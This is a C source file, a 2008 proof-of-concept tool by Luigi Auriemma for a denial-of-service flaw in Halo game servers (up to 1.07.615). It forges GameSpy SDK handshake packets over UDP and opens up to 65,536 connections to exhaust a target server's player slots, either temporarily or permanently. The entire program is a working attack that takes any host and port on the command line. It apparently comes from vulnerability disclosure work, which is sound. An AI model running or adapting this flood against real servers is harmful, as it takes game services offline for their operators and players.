/*
    Copyright 2008 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "gssdkcr.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        2302
#define BUFFSZ      8192



u32 halo_info(u8 *buff, struct sockaddr_in *peer);
int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int putcc(u8 *buff, int chr, int len);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer,
                        peerl;
    struct  linger  ling = {1,1};
    time_t  start_time;
    u32     ver;
    int     sd,
            i,
            len,
            attack,
            checktime   = 1;
    u16     port        = PORT;
    u8      buff[BUFFSZ],
            *psdk,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Halo <= 1.07.615 (before 30 Jul 2008) resources consumption "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bugs> <host> [port(%hu)]\n"
            "\n"
            "Bugs:\n"
            " 1 = the resources will be occupied and freed each 60 seconds, this bug\n"
            "     requires only the sending of one single packet and, so, is very fast\n"
            " 2 = the resources will be occupied forever\n"
            "\n"
            "Note: your outgoing ICMP packets MUST be blocked for testing the vulnerability\n"
            "      this is the default configuration on Windows with the firewall activated\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr  = resolv(argv[2]);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(time(NULL));
    peerl.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    ver = halo_info(buff, &peer);
    if(!ver) ver = 612000;
    psdk = buff + 7;

    start_time = time(NULL);

    printf("\n- start the testing:\n");
    for(i = 0; i <= 0xffff; i++) {
        printf("\r  connection %d: ", i);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
        do {
            peerl.sin_port++;
        } while(bind(sd, (struct sockaddr *)&peerl, sizeof(struct sockaddr_in)) < 0);

        p = buff;
        p += putxx(p, 0xfefe,   16);    // gssdk_header
        p += putxx(p, 1,        8);
        p += putxx(p, htons(0), 16);
        p += putxx(p, htons(0), 16);
        memset(psdk, '0',       32);
        gssdkcr(psdk, psdk,     0);     p += 32;

        if(attack != 1) {
            len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1);
            while(buff[2] != 2) {
                if(buff[2] == 0x68) printf(" you have been disconnected (players_per_IP limit)");
                len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 1);
            }

            p = buff;
            p += putxx(p, 0xfefe,   16);    // gssdk_header
            p += putxx(p, 3,        8);
            p += putxx(p, htons(1), 16);
            p += putxx(p, htons(1), 16);
            gssdkcr(psdk, buff + 39, 0);    p += 32;
            p += putcc(p, 0,        16);    // Halo handshake (not needed)
            p += putxx(p, ver,      32);    // this is NOT important in this bug!
        }

        len = send_recv(sd, buff, p - buff, NULL, 0, &peer, 1);
        close(sd);

        if((attack == 1) && checktime && ((time(NULL) - start_time) >= 60)) {
            printf("\n"
                "- one minute is passed, the resources on the server are freeing.\n"
                "  check the server manually\n");
            checktime = 0;
        }
    }

    printf("\n- done\n");
    return(0);
}



u32 halo_info(u8 *buff, struct sockaddr_in *peer) {
    u32     ver         = 0;
    int     sd,
            len;
    u8      *gamever    = NULL,
            *p;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("\n- send query\n");
    len = send_recv(sd, "\\status\\", 8, buff, BUFFSZ, peer, 0);
    if(len < 0) goto quit;

    printf("\n- handle reply:\n");
    gs_handle_info(buff, len, 1, '\\', 0, 0,
        "gamever",  &gamever,
        NULL,       NULL);

    if(gamever) {
        p = strrchr(gamever, '.');
        if(p) {
            p++;
        } else {
            p = gamever;
        }
        ver = atoi(p) * 1000;
    }

quit:
    close(sd);
    return(ver);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %35s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry = 2,
            len;

    if(in) {
        while(retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!out) return(0);
            if(!timeout(sd, 2)) break;
        }
    } else {
        if(timeout(sd, 3) < 0) retry = -1;
    }

    if(retry < 0) {
        if(!err) return(-1);
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int putcc(u8 *buff, int chr, int len) {
    memset(buff, chr, len);
    return(len);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


